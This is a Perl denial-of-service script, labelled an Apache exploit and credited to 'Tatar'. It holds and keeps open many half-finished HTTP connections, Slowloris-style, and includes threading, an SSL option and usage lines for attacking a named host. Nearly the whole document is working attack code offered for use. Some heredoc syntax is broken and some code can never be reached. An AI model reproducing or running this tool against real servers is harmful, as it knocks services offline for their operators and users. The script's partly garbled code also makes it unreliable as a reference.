Apache kill \DDOS\ attack

1. Apache kill \DDOS\ attack
2.  
3. #!/usr/bin/perl -w
4. # Exploit Title: Apache Server Denial of Service exploit (DDOS)
5. # Author: Tatar
6. # Version: 2.3.14 and older
7. # Tested on: CentOs
8.  
9.  
10. use strict;
11. use IO::Socket::INET;
12. use IO::Socket::SSL;
13. use Getopt::Long;
14. use Config;
15.  
16.  
17. $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
18.  
19. print < ooooooo ooooo .oooo.
20. `8888 d8' d8P'`Y8b
21. Y888..8P .ooooo. ooo. .oo. 888 888 ooo. .oo.
22. `8888' d88' `88b `888P"Y88b 888 888 `888P"Y88b
23. .8PY888. 888ooo888 888 888 888 888 888 888
24. d8' `888b 888 .o 888 888 `88b d88' 888 888
25. o888o o88888o `Y8bod8P' o888o o888o `Y8bd8P' o888o o888o
26.  
27. Welcome to Tatar Apache Attacker
28.  
29. EOTEXT
30.  
31. my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
32. my ( $cache, $xenon, $method, $ssl, $rand, $tcpto );
33. my $result = GetOptions('shost=s' => \$shost,'dns=s' => \$host,'xenon' => \$xenon,'num=i' => \$connections,'cache' => \$cache,'port=i' => \$port,'https' => \$ssl,'tcpto=i' => \$tcpto,'test' => \$test,'timeout=i' => \$timeout,'version' => \$version,);
34.  
35. if ($version) {
36. print "Version 1.0\n";
37. exit;
38. }
39.  
40. unless ($host) {
41. print "Test:\n\n\tperl $0 -dns [www.example.com] -test\n";
42. print "Usage:\n\n\tperl $0 -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon\n";
43.  
44. print "\n\temail: tatar@ gmail.com\n";
45. print "\n";
46. exit;
47. }
48.  
49. unless ($port) {
50. $port = 80;
51. print "Defaulting to port 80.\n";
52. }
53.  
54. unless ($tcpto) {
55. $tcpto = 5;
56. print "Defaulting to a 5 second tcp connection timeout.\n";
57. }
58.  
59. unless ($test) {
60. unless ($timeout) {
61. $timeout = 100;
62. print "Defaulting to a 100 second re-try timeout.\n";
63. }
64. unless ($connections) {
65. $connections = 1000;
66. print "Defaulting to 1000 connections.\n";
67. }
68. }
69.  
70. my $usemultithreading = 0;
71. if ( $Config{usethreads} ) {
72. print "Multithreading enabled.\n";
73. $usemultithreading = 1;
74. use threads;
75. use threads::shared;
76. }
77. else {
78. print "No multithreading capabilites found!\n";
79. print "Xen0n will be slower than normal as a result.\n";
80. }
81.  
82. my $packetcount : shared = 0;
83. my $failed : shared = 0;
84. my $connectioncount : shared = 0;
85.  
86. srand() if ($cache);
87.  
88. if ($shost) {
89. $sendhost = $shost;
90. }
91. else {
92. $sendhost = $host;
93. }
94. if ($xenon) {
95. $method = "POST";
96. }
97. else {
98. $method = "GET";
99. }
100.  
101. if ($test) {
102. my @times = ( "1", "30", "90", "240", "500" );
103. my $totaltime = 0;
104. foreach (@times) {
105. $totaltime = $totaltime + $_;
106. }
107. $totaltime = $totaltime / 60;
108. print "Testing $host could take up to $totaltime minutes.\n";
109.  
110. my $delay = 0;
111. my $working = 0;
112. my $sock;
113.  
114. if ($ssl) {
115. if (
116. $sock = new IO::Socket::SSL(
117. PeerAddr => "$host",
118. PeerPort => "$port",
119. Timeout => "$tcpto",
120. Proto => "tcp",
121. )
122. )
123. {
124. $working = 1;
125. }
126. }
127. else {
128. if (
129. $sock = new IO::Socket::INET(
130. PeerAddr => "$host",
131. PeerPort => "$port",
132. Timeout => "$tcpto",
133. Proto => "tcp",
134. )
135. )
136. {
137. $working = 1;
138. }
139. }
140. if ($working) {
141. if ($cache) {
142. $rand = "?" . int( rand(99999999999999) );
143. }
144. else {
145. $rand = "";
146. }
147. my $primarypayload =
148. "GET /$rand HTTP/1.1\r\n"
149. . "Host: $sendhost\r\n"
150. . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
151. . "Content-Length: 42\r\n";
152. if ( print $sock $primarypayload ) {
153. print "Connection successful, now just wait...\n";
154. }
155. else {
156. print
157. "That's odd - I connected but couldn't send the data to $host:$port.\n";
158. print "Is something wrong?\nDying.\n";
159. exit;
160. }
161. }
162. else {
163. print "Uhm... I can't connect to $host:$port.\n";
164. print "Is something wrong?\nDying.\n";
165. exit;
166. }
167. for ( my $i = 0 ; $i <= $#times ; $i++ ) {
168. print "Trying a $times[$i] second delay: \n";
169. sleep( $times[$i] );
170. if ( print $sock "X-a: b\r\n" ) {
171. print "\tWorked.\n";
172. $delay = $times[$i];
173. }
174. else {
175. if ( $SIG{__WARN__} ) {
176. $delay = $times[ $i - 1 ];
177. last;
178. }
179. print "\tFailed after $times[$i] seconds.\n";
180. }
181. }
182.  
183. if ( print $sock "Connection: Close\r\n\r\n" ) {
184. print "Okay that's enough time. Xen0n closed the socket.\n";
185. print "Use $delay seconds for -timeout.\n";
186. exit;
187. }
188. else {
189. print "Remote server closed socket.\n";
190. print "Use $delay seconds for -timeout.\n";
191. exit;
192. }
193. if ( $delay < 166 ) {
194. print <Since the timeout ended up being so small ($delay seconds) and it generally
195. takes between 200-500 threads for most servers and assuming any latency at
196. all... you might have trouble using Xen0n against this target. You can
197. tweak the -tcpto flag down to 1 second but it still may not build the sockets
198. in time.
199. EOSUCKS2BU
200. }
201. }
202. else {
203. print
204. "Attacking $host:$port every $timeout seconds with $connections sockets:\n";
205.  
206. if ($usemultithreading) {
207. domultithreading($connections);
208. }
209. else {
210. doconnections( $connections, $usemultithreading );
211. }
212. }
213.  
214. sub doconnections {
215. my ( $num, $usemultithreading ) = @_;
216. my ( @first, @sock, @working );
217. my $failedconnections = 0;
218. $working[$_] = 0 foreach ( 1 .. $num ); #initializing
219. $first[$_] = 0 foreach ( 1 .. $num ); #initializing
220. while (1) {
221. $failedconnections = 0;
222. print "\t\tBuilding sockets.\n";
223. foreach my $z ( 1 .. $num ) {
224. if ( $working[$z] == 0 ) {
225. if ($ssl) {
226. if (
227. $sock[$z] = new IO::Socket::SSL(
228. PeerAddr => "$host",
229. PeerPort => "$port",
230. Timeout => "$tcpto",
231. Proto => "tcp",
232. )
233. )
234. {
235. $working[$z] = 1;
236. }
237. else {
238. $working[$z] = 0;
239. }
240. }
241. else {
242. if (
243. $sock[$z] = new IO::Socket::INET(
244. PeerAddr => "$host",
245. PeerPort => "$port",
246. Timeout => "$tcpto",
247. Proto => "tcp",
248. )
249. )
250. {
251. $working[$z] = 1;
252. $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
253. }
254. else {
255. $working[$z] = 0;
256. }
257. }
258. if ( $working[$z] == 1 ) {
259. if ($cache) {
260. $rand = "?" . int( rand(99999999999999) );
261. }
262. else {
263. $rand = "";
264. }
265. my $primarypayload =
266. "$method /$rand HTTP/1.1\r\n"
267. . "Host: $sendhost\r\n"
268. . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
269. . "Content-Length: 42\r\n";
270. my $handle = $sock[$z];
271. if ($handle) {
272. print $handle "$primarypayload";
273. if ( $SIG{__WARN__} ) {
274. $working[$z] = 0;
275. close $handle;
276. $failed++;
277. $failedconnections++;
278. }
279. else {
280. $packetcount++;
281. $working[$z] = 1;
282. }
283. }
284. else {
285. $working[$z] = 0;
286. $failed++;
287. $failedconnections++;
288. }
289. }
290. else {
291. $working[$z] = 0;
292. $failed++;
293. $failedconnections++;
294. }
295. }
296. }
297. print "\t\tSending data.\n";
298. foreach my $z ( 1 .. $num ) {
299. if ( $working[$z] == 1 ) {
300. if ( $sock[$z] ) {
301. my $handle = $sock[$z];
302. if ( print $handle "X-a: b\r\n" ) {
303. $working[$z] = 1;
304. $packetcount++;
305. }
306. else {
307. $working[$z] = 0;
308. #debugging info
309. $failed++;
310. $failedconnections++;
311. }
312. }
313. else {
314. $working[$z] = 0;
315. #debugging info
316. $failed++;
317. $failedconnections++;
318. }
319. }
320. }
321. print
322. "Current stats:\tXen0n has sent $packetcount packets to $host.\nThe attack will sleep for $timeout seconds...\n\n";
323. sleep($timeout);
324. }
325. }
326.  
327. sub domultithreading {
328. my ($num) = @_;
329. my @thrs;
330. my $i = 0;
331. my $connectionsperthread = 50;
332. while ( $i < $num ) {
333. $thrs[$i] =
334. threads->create( \&doconnections, $connectionsperthread, 1 );
335. $i += $connectionsperthread;
336. }
337. my @threadslist = threads->list();
338. while ( $#threadslist > 0 ) {
339. $failed = 0;
340. }
341. }
342.  
343. __END__